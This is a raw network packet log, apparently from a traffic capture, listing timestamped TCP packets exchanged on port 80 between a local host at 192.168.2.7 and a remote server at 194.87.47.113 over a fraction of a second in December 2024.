Dec 19, 2024 08:47:28.703214884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.706007004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.706015110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.706031084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.706334114 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.706974983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.706984043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.707056046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.707979918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.707990885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.708158016 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.708888054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.708914042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.708946943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.709918022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.709927082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.709942102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.710012913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.710858107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.710867882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.710973978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.711813927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.712317944 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.712333918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.712383986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.713426113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.713434935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.713490009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.714257956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.714267969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.714276075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.714426994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.715214968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.715224028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.715286970 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.716375113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.716384888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.716517925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.717221975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.717231989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.717389107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.718142033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.718152046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.718233109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.719046116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.719067097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.719082117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.719125986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.720036983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.720046997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.720150948 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.721036911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.721046925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.721095085 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.721971035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.721981049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.721995115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.722143888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.724004030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.724869013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.724879026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.725048065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.725851059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.725861073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.725950003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.726810932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.726821899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.726890087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.727761984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.727771997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.727912903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.728744030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.728760004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.728804111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.729764938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.729774952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.729782104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.729836941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.729836941 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.730685949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.730701923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.730776072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.731642008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.731652975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.731661081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.731740952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.732677937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.732693911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.732722998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.733558893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.733629942 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.734091997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.734102011 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.734205961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.735033989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.735043049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.735097885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.735996008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.736005068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.736012936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.736160994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.736968994 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.736978054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.737076044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.737937927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.737965107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.737967968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.738126040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.738126040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.738918066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.738926888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.739020109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.739912033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.739928007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.739999056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.740832090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.740842104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.740935087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.741857052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.741875887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.741883993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.741933107 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.742856979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.742868900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.742947102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.743748903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.743758917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.743824959 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.744693041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.744709015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.744879961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.745699883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.745800972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.746644974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.746660948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.746669054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.746757030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.747613907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.747625113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.747714043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.748591900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.748609066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.748785019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.749583006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.749593019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.749654055 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.750487089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.750508070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.750575066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.751471996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.751482010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.751497030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.751602888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.751602888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.752480030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.752492905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.752684116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.753422976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.754410028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.754420996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.754439116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.754478931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.754493952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.755364895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.755847931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.755865097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.755950928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.756922007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.756936073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.757011890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.757776976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.757790089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.757838964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.758747101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.758763075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.758769989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.758956909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.758956909 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.759706974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.759722948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.759814978 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.760665894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.760699034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.760763884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.761643887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.761653900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.761729956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.762655020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.762664080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.762679100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.762803078 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.763561010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.763617992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.763650894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.764533997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.764554024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.764627934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.765542984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.765558958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.765620947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.766488075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.766496897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.766566038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.767452002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.767462015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.767477036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.767543077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.767543077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.768452883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.768462896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.768539906 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.769390106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.769401073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.769469976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.770308018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.770328045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.770405054 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.771326065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.771337032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.771469116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.772234917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.772288084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.809556961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.831943035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.832293987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.832376957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.832619905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.832629919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.832684040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.833498955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.833888054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.833970070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.834345102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.851064920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.851166010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.851273060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.851732969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.851741076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.851794958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.852407932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.852514029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.852864981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.853266954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.853313923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.853657007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.853775024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.853790998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.853874922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.854670048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.854686022 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.854712963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.855359077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.855369091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.855418921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.856193066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.856267929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.856677055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.857083082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.857091904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.857152939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.858015060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.858023882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.858144999 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.858840942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.858859062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.858886003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.859576941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.859586000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.859661102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.860464096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.860472918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.860527039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.861413956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.861424923 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.861443043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.861648083 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.862339020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.862349033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.862449884 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.863250971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.863260031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.863336086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.864134073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.864144087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.864237070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.864991903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.865005970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.865098000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.865854979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.865864992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.866022110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.866724014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.866739988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.866813898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.867594957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.867604017 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.867641926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.868484974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.868493080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.868552923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.869384050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.869393110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.869443893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.870284081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.870299101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.870419979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.871258020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.871273041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.871335983 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.872215986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.872226000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.872312069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.873168945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.873187065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.873284101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.874124050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.874134064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.874227047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.875145912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.875164986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.875238895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.876121044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.876131058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.876177073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.877093077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.877103090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.877110004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.877219915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.877998114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.878042936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.878134012 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.879081964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.879091978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.879167080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.879920959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.879937887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.879987001 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:28.880964041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.880973101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:28.880987883 CET	80	49707	194.87.47.113	192.168.2.7
